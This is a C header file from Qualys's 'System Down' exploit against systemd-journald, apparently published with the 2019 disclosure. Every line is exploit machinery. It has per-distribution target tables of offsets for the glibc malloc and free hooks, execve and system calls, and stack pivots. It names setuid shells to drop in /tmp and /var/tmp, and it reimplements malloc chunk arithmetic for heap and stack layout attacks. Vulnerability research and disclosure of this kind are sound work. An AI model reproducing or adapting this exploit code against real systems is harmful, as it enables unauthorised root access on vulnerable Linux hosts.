/*
 * System Down: A systemd-journald exploit
 * https://www.qualys.com/2019/01/09/system-down/system-down.txt
 * Copyright (C) 2019 Qualys, Inc.
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <https://www.gnu.org/licenses/>.
 */

#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#include "macro.h"

void initialize_target(void);

enum {
    TARGET_NONE,
    TARGET_I386,
    TARGET_AMD64,
};

typedef struct {
    const char * digest;
    const char * file;
} md5sum_t;

typedef struct {
    const char * name;
    md5sum_t md5sums[4];
    int arch;
    bool deny_memfd;
    const char * dev_log;
    size_t malloc_alignment;
    size_t n_iovec_meta_fields;
    size_t n_iovec_object_fields;
    size_t stack_pointer_distance;
    size_t items_alloca_shift;
    size_t transport_offset;

    /* i386 */
    size_t malloc_hook_offset;
    size_t call_execve_offset;
    size_t stack_pivot_offset;
    uintptr_t stack_pivot_esp;
    size_t stack_pivot_retn;

    /* amd64 */
    size_t free_hook_offset;
    size_t stderr_chain_offset;
    size_t wfile_jumps_offset;
    size_t system_offset;
    size_t ldso_rx_size;
    bool setuid_shells;
} target_t;

#define DECLARE_TARGET_ACCESSOR(member) \
typeof(((target_t *)0)->member) target_ ## member(void);

DECLARE_TARGET_ACCESSOR(arch)
DECLARE_TARGET_ACCESSOR(dev_log)
DECLARE_TARGET_ACCESSOR(deny_memfd)
DECLARE_TARGET_ACCESSOR(malloc_alignment)
DECLARE_TARGET_ACCESSOR(n_iovec_meta_fields)
DECLARE_TARGET_ACCESSOR(n_iovec_object_fields)

#define N_IOVEC_META_FIELDS (target_n_iovec_meta_fields())
#define N_IOVEC_OBJECT_FIELDS (target_n_iovec_object_fields())

DECLARE_TARGET_ACCESSOR(stack_pointer_distance)
DECLARE_TARGET_ACCESSOR(items_alloca_shift)

DECLARE_TARGET_ACCESSOR(malloc_hook_offset)
DECLARE_TARGET_ACCESSOR(call_execve_offset)
DECLARE_TARGET_ACCESSOR(stack_pivot_offset)
DECLARE_TARGET_ACCESSOR(stack_pivot_esp)
DECLARE_TARGET_ACCESSOR(stack_pivot_retn)

DECLARE_TARGET_ACCESSOR(free_hook_offset)
DECLARE_TARGET_ACCESSOR(stderr_chain_offset)
DECLARE_TARGET_ACCESSOR(wfile_jumps_offset)
DECLARE_TARGET_ACCESSOR(system_offset)
DECLARE_TARGET_ACCESSOR(setuid_shells)
DECLARE_TARGET_ACCESSOR(ldso_rx_size)

#define SETUID_SHELLS "/tmp/bob /var/tmp/boomsh"

const char * target_bin_journald(void);
size_t target_mmap_threshold_max(void);
uintptr_t target_stack_top_max(void);

bool is_pie_address(uintptr_t address);
bool is_mmap_address(uintptr_t address);
bool is_stack_address(uintptr_t address);
bool is_valid_address(uintptr_t address);
bool is_transport_address(uintptr_t address);

#define INTERNAL_SIZE_T size_t
#define SIZE_SZ (sizeof (INTERNAL_SIZE_T))
#define MALLOC_ALIGNMENT (target_malloc_alignment())
#define MALLOC_ALIGN_MASK (MALLOC_ALIGNMENT - 1)

struct malloc_chunk {

  INTERNAL_SIZE_T      mchunk_prev_size;  /* Size of previous chunk (if free).  */
  INTERNAL_SIZE_T      mchunk_size;       /* Size in bytes, including overhead. */

  struct malloc_chunk* fd;         /* double links -- used only if free. */
  struct malloc_chunk* bk;

  /* Only used for large blocks: pointer to next larger size.  */
  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
  struct malloc_chunk* bk_nextsize;
};

#define chunk2mem() (2*SIZE_SZ)

static inline size_t
mmap2chunk(void)
{
    const size_t front_misalign = chunk2mem() & MALLOC_ALIGN_MASK;
    if (front_misalign >= MALLOC_ALIGNMENT) die();
    const size_t correction = (front_misalign > 0) ? (MALLOC_ALIGNMENT - front_misalign) : 0;
    return correction;
}

#define mmap2mem() (mmap2chunk() + chunk2mem())

#define MIN_CHUNK_SIZE (offsetof(struct malloc_chunk, fd_nextsize))
#define MINSIZE ((MIN_CHUNK_SIZE + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)
#define DEFAULT_MMAP_THRESHOLD_MIN (128 * 1024)
#define ELF64_SEGMENT_ALIGNMENT (0x200000)

static inline size_t
request2size(const size_t req)
{
    const size_t sz = req + SIZE_SZ + MALLOC_ALIGN_MASK;
    if (sz <= req) die();
    if (sz >= -2 * MINSIZE) die();
    return (sz < MINSIZE) ? MINSIZE : (sz & ~MALLOC_ALIGN_MASK);
}

#define _STK_LIM  (8*1024*1024)
#define MIN_GAP (128*1024*1024UL)
#define PID_MAX_LIMIT (sizeof(long) > 4 ? 4 * 1024 * 1024 : 0x8000)

#define PAGE_SIZE ((size_t)4096)
#define PAGE_ALIGN(l) (ALIGN_TO((l), PAGE_SIZE))

